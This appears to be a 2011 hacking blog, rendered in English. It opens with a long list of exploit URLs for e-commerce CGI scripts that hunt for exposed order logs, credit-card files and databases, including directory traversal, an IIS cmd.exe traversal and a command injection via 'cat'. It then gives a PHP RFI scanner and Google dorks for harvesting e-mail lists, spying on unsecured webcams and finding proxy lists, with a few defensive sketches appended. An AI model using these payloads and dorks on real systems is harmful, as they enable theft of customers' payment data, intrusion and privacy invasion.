/cgi-bin/UltraBoard/UltraBoard.cgi?Action=PrintableTopic&Post=../../UBData/Members/members.grp&Board=6210&Idle=10&Sort=0&Order=Des cend&Page=0&Session=;;;
/_private/shopping_cart.mdb
/cgi-bin/shopper.cgi
/cgi-bin/shop.cgi
/cgi-bin/perlshop.cgi
/cgi-bin/mall2000.cgi
/log/
/logfile/
/logfiles/
/logger/
/logging/
/logs/
/logs/access_log
/weblog/
/weblogs/
/cgi-bin/loadpage.cgi
/database/
/databases/
/cgi-bin/Web_Store/web_store.cgi
/scripts/cart32.exe
/scripts/c32web.exe
/cgi-bin/shopper?search=action&keywords=dhenzuser%20&templa te=order.log
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/ezmall2000/mall2000.cgi
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/DCShop/Auth_data/auth_user_file.txt
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt
/cgi-bin/cart32/whatever-OUTPUT.txt
/cgi-bin/shopper.cgi?search=action&keywords=root%20&templat e=order.log
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt;CC
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=orde r.log
/derbyteccgi/shopper.cgi?search=action&keywords=moron&template= order.log
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;c at%20../../webcart/system/orders/orders.txt|&CODE=PHOLD;;;
/ccbill/secure/ccbill.log
/cgibin/shopper.cgi?search=action&keywords=moron&template= order.csv
/order13.txt
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txtcgi-bin/PDG_Cart/order.log
/cgi-bin/shopper.cgi?search=action&keywords=whinhall&templa te=order.log
/orders/db/zzzbizorders.log.html
/cgi-bin/Shopper.exe?search=action&keywords=psiber%20&templ ate=other
isinglogorder.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template =order.log
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order. log
/cgi-bin/shopper.exe?preadd=action&key=bajk390ss&template=o rder.log
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/cgi-bin/cart32/CART32-order.txt
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html
/cgi-bin/cart32.ini
/cgi-bin/cart32.exe/cart32clientlist
/cgi-bin/cart32.exe/error
/metacart/database/metacart.mdb
//shopping/database/metacart.mdb
/shopping/database/metacart.mdb
/fpdb/shop.mdb
/cgi-bin/shopper.cgi?keywords=usstick&search=action&templat e=order.log
/cgi-bin/shopper.cgi?display=action&template=order.log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=order. log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=sales. log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=sell.l og
/cgi-bin/shopper.exe?key=8360&preadd=action&template=admin. log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=admin_ files.log
/cgi-bin/shopper.cgi?keywords=usstick&search=action&templat e=order.log
/cgi-bin/shopper.cgi?keywords=psiber&search=action&template =order.log
/cgi-bin/shopper.cgi?keywords=9461&search=action&template=o rder.log
/cgi-bin/shopper.cgi?keywords=SC7021&search=action&template =order.log
/cgi-bin/shopper.cgi?keywords=cc&search=action&template=ord er.log
/cgi-bin/shopper.cgi?keywords=order&search=action&template= order.log
/cgi-bin/shopper.cgi?display=action&template=order.log
/cgi-bin/shopper.cgi?search=action&keywords=moron%20&templa te=shopper.conf
/Merchant2/modules/log/elf.mv?search=action&ORDERLOG.txt
/Merchant2/modules/log/malf.mv?search=action&ORDERLOG.txt
/cgi-bin/shopper.exe?search=action&keywords=CD006&template= sales.log
/cgi-bin/shopper.exe?search=action&keywords=***&template=se ll.log
/cgi-bin/shopper.exe?search=action&keywords=order&template= admin.log
/cgi-bin/shopper.exe?search=action&keywords=cc&template=adm in_files.log
/cgi-bin/shopper.exe?search=action&keywords=hack&template=o rder.log
/cgi-bin/shopper.exe?search=action&keywords=9400&template=o rder.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template =order.log
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-bin/shopper.cgi?search=action&keywords=root%20&templat e=order.log
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order. log
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=orde r.log
/cgi-bin/cart32/mainframephotographics-ORDERS.txt
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/stats/08-hosts.htm&TEMPLATE=ORDER.LOG
/worlddirect/Web_store/Admin_files/order.log
/website/
/WebShop/templates/cc.txt
/WebShop/logs/ck.log
/WebShop/logs/cc.txt
/WebShop/logs/
/WebShop/
/WebCart/orders.txt
/webcart/
/Web_store/Admin_files/order.log
/STORE/orders.txt
/stats/08-hosts.htm&TEMPLATE=ORDER.LOG
/PSUser/PSCOErrPage.htm
/PDG_Cart/shopper.conf
/PDG_Cart/order.log
/PDG_Cart/authorizenets.txt
/PDG/order.txt
/orders/results
/Orders/orders.txt
/orders/order.log
/orders/mountain.cf
/orders/import.txt
/orders/import.txt
/orders/checks.txt
/orders/
/orders.txt
/orders.htm
/orderform/orders.txt
/order.txt
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=orde r.log
/cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/shopper.exe?search=action&keywords=%20&template=sh opper.conf
/cgi-bin/shopper.exe
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/cgi-bin/perlshop.cgi
/cgi-bin/PDG_Cart/cc.log
/cgi-bin/orders/mc.txt
/cgi-bin/orders/cc.txt
/cgi-bin/orders.txt
/cgi-bin/orderlog.txt
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txt
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtm
/cgi-bin/ezmall2000/mall_log_files/order.log
/cgi-bin/cart32/mainframephotographics-ORDERS.txt
/cgi-bin/cart32/CART32-order.txt
/cgi-bin/cart.pl
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/AdvWorks/equipment/catalog_type.asp
/Admin_files/order.log
/admin/Orders/orders.txt 

Friday, 25 February 2011

ONLINE SQLI SCANNER - GOOGLE INURL BRASIL

Google INURL Brasil SQLi scanner: it uses simple dorks, gives immediate results, carries no virus risk and is 100% free.
Misuse is the user's responsibility; all content is for study purposes.


Sunday, 20 February 2011

PHP SCRIPT Security-Shell RFI Scanner v1.0


Security-Shell RFI Scanner v1.0 is an RFI scanner for those of you who are always scanning.


* Copyright (C) 2007 by pentest
* http://security-sh3ll.com
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
*
* but WITHOUT ANY WARRANTY, without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.


<?php
/***************************************************************************
 *   PHP Security-Shell RFI Scanner v1.0                                   *
 *                                                                         *
 *   Copyright (C) 2007 by pentest                                         *
 *                                                                         *
 *   http://security-sh3ll.com                                             *
 *                                                                         *
 *   This program is free software; you can redistribute it and/or modify  *
 *   it under the terms of the GNU General Public License as published by  *
 *   the Free Software Foundation; either version 2 of the License, or     *
 *   (at your option) any later version.                                   *
 *                                                                         *
 *   This program is distributed in the hope that it will be useful,       *
 *   but WITHOUT ANY WARRANTY; without even the implied warranty of        *
 *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the         *
 *   GNU General Public License for more details.                          *
 *                                                                         *
 ***************************************************************************/
 
    /* Regex to find include/require statements whose argument starts with a variable */
    $escan_inc_regex   = array( '/include(_once)?.\$/ix', '/require(_once)?.\$/ix' );
    /* Regex to extract the names of variables */
    $escan_var_regex   = array( '/\Ainclude(_once)?./is', '/\Arequire(_once)?./is' );
    /* Array of file extensions to scan */
    $escan_valid_ext   = array( 'php' );
    /* Maximum size of a file to scan, scans all if 0 */
    $escan_max_size    = 0;
    /* Count of directories crawled */
    $escan_dir_count   = 0;
    /* Count of files scanned */
    $escan_file_count  = 0;
    /* Count of potential RFI found */
    $escan_match_count = 0;
    /* Total bytes scanned */
    $escan_byte_count  = 0;
 
    escan_banner();
 
 
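    if( $argc < 2 ){
        escan_usage($argv[0]);
    }
    else{
        /* realpath() returns false for a missing path; unchecked, the scan would start at the filesystem root */
        $root = realpath($argv[1]);

        if( $root === false || !is_dir($root) ){
            print "@ Not a directory : {$argv[1]}\n";
            exit(1);
        }

        $stime = escan_get_mtime();

        escan_recurse_dir( $root.DIRECTORY_SEPARATOR );

        $etime = escan_get_mtime();

        print "\n@ Scan report : \n\n" .
              "\t$escan_dir_count directory .\n".
              "\t$escan_file_count file .\n".
              "\t" . escan_format_size($escan_byte_count) . " .\n".
              "\t$escan_match_count Potential RFI .\n".
              "\t".($etime-$stime) . " Second Processing .\n\n";
    }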
 
    /* Formats a size given in bytes as a human-readable string */
    function escan_format_size($bytes)
    {
        if( $bytes < 1024       ) return "$bytes bytes";
        if( $bytes < 1048576    ) return ($bytes / 1024) . " Kb";
        if( $bytes < 1073741824 ) return ($bytes / 1048576) . " Mb";
 
        return ($bytes / 1073741824) . " Gb";
    }
 
    /* Returns the timestamp in seconds */
    function escan_get_mtime()
    {
        list($usec, $sec) = explode(" ",microtime());
        return ((float)$usec + (float)$sec);
    }
 
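    /* Extracts the include/require statement that starts at $offset, up to and including the next ';' */
    function escan_scan_line($content,$offset)
    {
        /* Limit of 2 and index [0] avoid an undefined-offset warning when no ';' follows */
        $parts = explode( ";", substr($content,$offset), 2 );

        return $parts[0].";";
    }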
 
    /* Extract the variable name from line of code inclusion */
    function escan_parse_var( $line, $regex_id )
    {
        global $escan_var_regex;
 
        $vars       = preg_split($escan_var_regex[$regex_id],$line);
        $varname    = $vars[1];
        $delimiters = " .);";
 
        for( $i = 0; $i < strlen($varname); $i++ ){
            for( $j = 0; $j < strlen($delimiters); $j++ ){
                if($varname[$i] == $delimiters[$j]){
                    return substr( $varname, 0, $i );
                }
            }
        }
 
        return $varname;
    }
 
    /* Checks whether the variable $var is assigned in $content before position $offset (object properties are treated as defined) */
    function escan_check_definitions($content,$offset,$var)
    {
        if( strpos( $var, "->" ) ){
            return 1;
        }
 
        $chunk = substr($content,0,$offset);
        $regex = "/".preg_quote($var,"/")."\s*=/ix";
        preg_match( $regex, $chunk,$matches );
 
        return count($matches);
    }
 
    /* Scans $file for potential RFI: an include/require of a variable that is not assigned earlier in the file */
    function escan_parse_file($file)
    {
        global $escan_inc_regex;
        global $escan_max_size;
        global $escan_file_count;
        global $escan_match_count;
        global $escan_byte_count;
 
        $fsize = filesize($file);
 
        if( $escan_max_size && $fsize > $escan_max_size ) return;
 
        $escan_file_count++;
        $escan_byte_count += $fsize;
 
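        $content = @file_get_contents($file);

        /* Skip unreadable files instead of passing false to preg_match_all() */
        if( $content === false ) return;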
 
        for( $i = 0; $i < count($escan_inc_regex); $i++ ){
            if( preg_match_all( $escan_inc_regex[$i], $content, $matches, PREG_OFFSET_CAPTURE ) ){
 
                $nmatch = count($matches[0]);
 
                for( $j = 0; $j < $nmatch; $j++ ){
                    $offset = $matches[0][$j][1];
                    $line   = escan_scan_line($content,$offset);
                    $var    = escan_parse_var($line,$i);
 
                    if( escan_check_definitions($content,$offset,$var) == 0 )
                    {
                        $escan_match_count++;
                        print "@ $file - \n\t- '$var' The position $offset .\n";
                    }
                }
            }
        }
    }
 
    /* Returns the file extension $fname */
    function escan_get_file_ext($fname)
    {
        if( strchr($fname,'.') ){
            return substr($fname,strrpos($fname,'.')+1);
        }
        else{
            return "";
        }
    }
 
    /* Checks whether file $fname has one of the extensions to scan */
    function escan_isvalid_ext($fname)
    {
        global $escan_valid_ext;
 
        for( $i = 0; $i < count($escan_valid_ext); $i++ ){
            if(strstr(escan_get_file_ext($fname),$escan_valid_ext[$i])){
                return true;
            }
        }
 
        return false;
    }
 
    /* Scans directories recursively */
    function escan_recurse_dir($dir)
    {
        global $escan_dir_count;
 
        $escan_dir_count++;
 
        if( $cdir = @dir($dir) ){
            /* Strict comparison so that an entry named "0" does not end the loop early */
            while( false !== ($entry = $cdir->read()) ){
                if( $entry != '.' && $entry != '..' ){
                    if( is_dir($dir.$entry) ){
                        escan_recurse_dir($dir.$entry.DIRECTORY_SEPARATOR);
                    }
                    else{
                        if( escan_isvalid_ext($dir.$entry) ){
                            escan_parse_file($dir.$entry);
                        }
                    }
                }
            }
 
            $cdir->close();
        }
    }
 
    function escan_banner()
    {
        print "*-----------------------------------------------------*\n" .
              "*   PHP Security-Shell RFI Scanner v1.0  by pentest   *\n" .
              "*                                                     *\n" .
              "*             http://security-sh3ll.com               *\n" .
              "*-----------------------------------------------------*\n\n";
    }
 
    function escan_usage($pname)
    {
        /* The script takes the directory to scan as its only argument */
        print "Use : php $pname <directory>\n";
    }
?>

Online SQLi scanner made by the HCV group

Online SQLi scanner made by the kinginfet group

Online SQLi scanner made by the HCV group. Besides scanning, it also tests the vulnerabilities using SQL injection techniques. I hope you like it; I will put up an online scan with special strings for it. Happy scanning.

Joomla CMS vulnerability scanner program

JOOMLA SECURITY SCANNER

Here is a scanner program that sweeps Joomla-built sites for vulnerabilities; the link follows below.
DOWNLOAD THE SCANNER:

Wednesday, 16 February 2011

Capturing e-mail lists from CSV files



I created a dork to search for mailing lists stored in CSV files on websites.
Below is an introduction to what CSV is.


Comma-separated values (CSV) is a file format that stores tabular data and has been in wide use since the mainframe era. Because they are so simple, .csv files are common on every computer platform.
CSV is a particular implementation of delimiter-separated text files that uses the comma and the line break to separate values. The format also uses quotation marks around fields that contain the reserved characters (comma and line break). This robustness makes CSV more broadly applicable than other digital formats of the same kind.

Specification

Although there is no formal specification of the CSV format, RFC 4180 describes a common format and establishes text/csv as a MIME type registered with IANA. Formally, CSV is a delimited data format whose fields (columns) are separated by comma characters and whose records (rows) are separated by line-break characters. Fields that contain special characters (comma, line break or quotation mark) must be enclosed in quotation marks. However, if a line contains a single entry that is an empty string, it may also be enclosed in quotation marks. If a field contains a quotation mark, it is escaped by placing another quotation mark immediately after it. The CSV format does not require a particular character encoding, byte order or line-terminator format.

Example

1997 | Ford | E350 | ac, abs, moon | 3000.00
1999 | Chevy | Venture "Extended Edition" | (empty) | 4900.00
1996 | Jeep | Grand Cherokee | MUST SELL! [line break] air, moon roof, loaded | 4799.00

The table above can be represented in CSV as follows:
1997,Ford,E350,"ac, abs, moon",3000.00
1999,Chevy,"Venture ""Extended Edition""",,4900.00
1996,Jeep,Grand Cherokee,"MUST SELL!
air, moon roof, loaded",4799.00
------------------------------------------------------------------------------------------------------------
Quantity: approximately 1 string
Author: Cleiton Pinheiro
Source: blog.inurl.com.br
Search code:
 +@  +intext:(*mail*) +hotmail +br ext:csv
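
From the site owner's side, the exposure this search relies on can be checked before a crawler finds it. The sketch below is an added example, not code from the original post: it walks a web root, parses each .csv file with the quoting rules described above, and reports files whose fields contain e-mail addresses. The directory layout, file names and addresses are constructed for illustration.

```python
import csv
import io
import os
import re
import tempfile

# Deliberately simple address pattern: enough to flag a file for human review.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")


def count_email_fields(csv_text):
    """Return (records, fields_with_email) for one CSV document.

    csv.reader applies the quoting rules described above: quoted fields may
    contain commas and line breaks, and "" inside quotes is a literal quote.
    """
    records = 0
    hits = 0
    for row in csv.reader(io.StringIO(csv_text, newline="")):
        if not row:
            continue
        records += 1
        hits += sum(1 for field in row if EMAIL_RE.search(field))
    return records, hits


def audit_webroot(webroot, min_hits=2):
    """Walk a document root and report .csv files that hold e-mail addresses.

    Returns a sorted list of (relative_path, records, email_fields) for files
    with at least min_hits address-bearing fields.
    """
    findings = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            if not name.lower().endswith(".csv"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, newline="", encoding="utf-8", errors="replace") as fh:
                    records, hits = count_email_fields(fh.read())
            except (OSError, csv.Error):
                continue  # unreadable or malformed file: skip, do not abort the audit
            if hits >= min_hits:
                findings.append((os.path.relpath(path, webroot), records, hits))
    return sorted(findings)


def demo():
    """Build a constructed web root in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "newsletter"))
        # Constructed sample data; addresses use the reserved example.* domains.
        samples = {
            "cars.csv": '1997,Ford,E350,"ac, abs, moon",3000.00\n'
                        '1996,Jeep,Grand Cherokee,"MUST SELL!\nair, moon roof, loaded",4799.00\n',
            os.path.join("newsletter", "subscribers.csv"):
                'name,email,note\n'
                '"Silva, Ana",ana@example.com,"said ""hi"""\n'
                'Bruno,bruno@example.org,"line one\nline two"\n',
        }
        for rel, text in samples.items():
            with open(os.path.join(root, rel), "w", newline="", encoding="utf-8") as fh:
                fh.write(text)
        return audit_webroot(root)


if __name__ == "__main__":
    for rel, records, hits in demo():
        print(f"{rel}: {records} records, {hits} fields containing an e-mail address")
```

Files reported by the audit are candidates for moving out of the document root or placing behind authentication.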

Tuesday, 25 January 2011

Searching for online webcams

webcam hacking
I made this string for those who like to snoop on other people's lives. This search code gives access to approximately 79,900 results (0.31 seconds). The search excludes sites that contain the terms hack, hacker and crack, which keeps the results cleaner and more focused.
Quantity: 1 string
Author: Cleiton Pinheiro
Source: blog.inurl.com.br
Code:
+inurl:/control/userimage.html -blog -hack -hacker -crack

String for finding proxy lists

proxy


A proxy is a server that handles requests by forwarding the client's data onward. A user (client) connects to a proxy server and requests some service, such as a file, a connection, a website or another resource available on a different server.
A proxy server may optionally alter the client's request or the server's response and can sometimes provide the resource without even connecting to the specified server. It can also act as a server that caches data in computer networks. Proxies are installed on machines with connections typically faster than the clients' and with high storage capacity.
These servers have a range of uses, such as content filtering and providing anonymity, among others.
An HTTP caching proxy, for example, lets the client request a document on the World Wide Web, and the proxy looks for the document in its cache. If found, the document is returned immediately. Otherwise, the proxy fetches the document from the remote server, delivers it to the client and saves a copy in its cache. This reduces latency, since the proxy server rather than the origin server is accessed, and also reduces bandwidth use.



With that, we understand the importance of a proxy.
I created a Google dork to search for these proxy lists available on websites.

Dork string
Quantity: 1 string
Author: Cleiton Pinheiro
Source: blog.inurl.com.br
Code:
+":8080" +":3128" +":80" filetype:txt

Proxy list

Dorks for RFI scanners

Remote File Inclusion

Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few, it can lead to:
RFI strings - INJECTION
a small list of dorks
Quantity: approximately 596 strings
Author: unknown
Source: goo.gl/5IPJM
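
How a defender can spot the requests this vulnerability class produces, as an added example that is not part of the original post: it scans web-server access-log lines for query parameters whose value is a remote URL. The log lines, host names and the own_hosts allow-list are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Common Log Format: client address, then the quoted request line, then the status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# A parameter value that itself starts with a remote scheme is what an
# include() of unvalidated input would end up fetching.
REMOTE_VALUE_RE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)

# Constructed sample log (documentation address ranges and reserved domains).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Feb/2011:10:00:01 -0300] "GET /index.php?id=42 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [20/Feb/2011:10:00:05 -0300] '
    '"GET /index.php?page=http://files.example.invalid/a.txt? HTTP/1.1" 200 734',
    '198.51.100.7 - - [20/Feb/2011:10:00:06 -0300] '
    '"GET /view.php?inc=hTtP%253A%252F%252Ffiles.example.invalid%252Fa.txt HTTP/1.1" 404 210',
    '192.0.2.33 - - [20/Feb/2011:10:01:12 -0300] '
    '"GET /login.php?next=https://www.example.com/home HTTP/1.1" 302 0',
]


def fully_unquote(value, max_rounds=3):
    """Undo nested percent-encoding, bounded so crafted input cannot loop forever."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_rfi_attempts(log_lines, own_hosts=()):
    """Return (ip, path, param, status) for each request parameter holding a remote URL.

    own_hosts lists host names that legitimately appear in parameters
    (redirect targets, for instance) and should not be reported.
    """
    findings = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        target = urlsplit(m.group("target"))
        # parse_qsl decodes one layer of percent-encoding; fully_unquote handles the rest.
        for param, raw in parse_qsl(target.query, keep_blank_values=True):
            value = fully_unquote(raw)
            if not REMOTE_VALUE_RE.match(value):
                continue
            host = (urlsplit(value.strip()).hostname or "").lower()
            if host in own_hosts:
                continue
            findings.append((m.group("ip"), target.path, param, int(m.group("status"))))
    return findings


if __name__ == "__main__":
    for ip, path, param, status in find_rfi_attempts(SAMPLE_LOG, own_hosts={"www.example.com"}):
        print(f"{ip} {path} param={param} status={status}")
```

A hit answered with status 200 deserves the closest look, since the script served the request instead of rejecting it.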